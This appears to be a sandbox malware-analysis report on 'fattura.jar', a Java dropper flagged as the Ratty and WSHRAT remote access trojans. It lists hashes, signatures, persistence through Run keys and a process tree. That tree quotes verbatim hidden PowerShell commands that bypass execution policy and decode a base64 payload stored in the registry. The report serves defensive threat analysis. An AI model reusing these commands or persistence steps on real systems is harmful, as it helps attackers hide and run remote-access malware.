Overview

overview

10

Static

static

fattura.jar

windows7_x64

10

fattura.jar

windows10_x64

10

Analysis

  • max time kernel
    148s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    10-07-2020 10:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fattura.jar

  • Size

    221KB

  • MD5

    4ebaf0ed00b6136fe1e4273508d855fa

  • SHA1

    a3e6b82b95500b8eda4ab37a8f3865d47af3c7ad

  • SHA256

    be32a4b1ba9b1ac7803eac01ca4a38f96770ad27d2d434794809ba3242182b0d

  • SHA512

    80c243457a0b879b0cd2484837357326593131207e200f93cd4f40a2ce5dd4c8e5590c6f67638b7942c1ca6634abc637fa9658b81791116419960deb349f49c3

Score
10/10
persistencetrojanwshratratratty

Malware Config

Signatures

  • Ratty

    Ratty is an open source Java Remote Access Tool.

    trojanratratty
  • Ratty Rat Payload 1 IoCs
  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

    trojanwshrat
  • Blacklisted process makes network request 25 IoCs
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\fattura.jar
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1104
    • C:\Windows\system32\wscript.exe
      wscript C:\Users\Admin\wppvqiibus.vbs
      2⤵
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!%','m');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1636
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\gVbTbNmsTj.vbs"
        3⤵
        • Blacklisted process makes network request
        • Drops startup file
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:1520
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!%','A');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1928
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre7\bin\javaw.exe" -version 2> C:\Users\Admin\AppData\Local\Temp\output.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Program Files\Java\jre7\bin\javaw.exe
          "C:\Program Files\Java\jre7\bin\javaw.exe" -version
          4⤵
            PID:1844
        • C:\Program Files\Java\jre7\bin\javaw.exe
          "C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\ntfsmgr.jar"
          3⤵
          • Suspicious behavior: GetForegroundWindowSpam
          PID:1676

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1500-12-0x00000000028B0000-0x00000000028B4000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1520-18-0x0000000000320000-0x0000000000322000-memory.dmp

      Filesize

      8KB

      Download